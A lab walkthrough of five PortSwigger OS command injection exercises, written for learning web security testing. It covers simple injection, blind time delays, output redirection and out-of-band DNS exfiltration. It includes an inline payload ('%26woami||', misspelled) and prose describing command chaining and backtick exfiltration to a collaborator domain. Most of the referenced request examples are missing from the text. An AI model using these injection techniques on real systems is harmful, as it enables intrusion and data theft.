Command Injection Labs
LAB #1: OS command injection - a simple case
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-simple
Objective: Execute the whoami command to determine the name of the current user.
This lab contains a shopping application that has different no of products for purchase. Each product has Check Stock a functionality in which we can see which products are in stock.
For checking the stock they are sending the POST request to the /product/stock endpoint with the following parameters.
If we change the productID with %26woami|| we can successfully execute the shell commands.
LAB #2: Blind OS command injection with time delays
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays
Objective: Exploit the blind OS command that causes a 10-second delay.
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback functionality on /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following we will see certain seconds of time delay in our response.
There we use || to break the shell command and then add a ping command localhost that will send total request pings after that we separate the remaining command with the || character. They are using OS native email functionality to send an email that gets the email, and subject like this.
They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this
LAB #3: Blind OS command injection with output redirection
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection
Objective: Execute the whoami command and retrieve its output.
This lab contains a shopping application that has a different number of products for purchase. The site also has a submit feedback functionality on /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following we will see certain seconds of time delay in our response.
There we use || to break the shell command and then add a ping command to send a ping to localhost that will send total request pings after that we separate the remaining command with the || character. They use OS-native email functionality to send an email that gets the email, and subject like this.
They add our user-supplied email without any validation into the shell command and with that, the above shell command becomes like this
Confirming we have a blind command injection we can run any command and redirect its output to a file in a readable directory. After that, we can read that file by visiting that file URL in the browser. So the steps should look like the following.
There we use the following command in the email parameter.
this executes the whoami the command that is used to get the username of the currently logged-in user in the OS and then we use the output redirector > that will redirect the output of the command to a file and writes it so we supplied /var/www/images/whoami.txt path. In which whoami.txt is the file created and contains the output of the whoami command.
As we know the site uses the following url to fetch images.
We can use that to get out the whoami.txt file like the following.
LAB #4: Blind OS command injection with out-of-band interaction
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band
Objective: Exploit OS command injection to issue a DNS lookup to Burp Collaborator
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback functionality on /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following
we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction.
LAB #5: Blind OS command injection with out-of-band data exfiltration
Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration
Objective: Exploit OS command injection to do an out-of-band interaction to exfiltrate the output of whoami command.
This lab contains a shopping application that has a different number of products for purchase. The site also has submit feedback functionality on /feedback/submit. We can submit feedback using a POST request with the parameters csrf, name, email, subject, and message. This request looks like the following.
If we change the email parameter like the following
we will not see any certain seconds of time delay in our response but if we supplied a burp collaborator domain like this we will see an out-of-band interaction.
Knowing there is a command injection vulnerability we can exfiltrate data like the following.
There we use backticks to run the inline shell command and append its output to our burp collaborator subdomain. So when this command run we will see the username of the currently logged-in user with the domain name like the following in our burp collaborator logs.
Last updated
Was this helpful?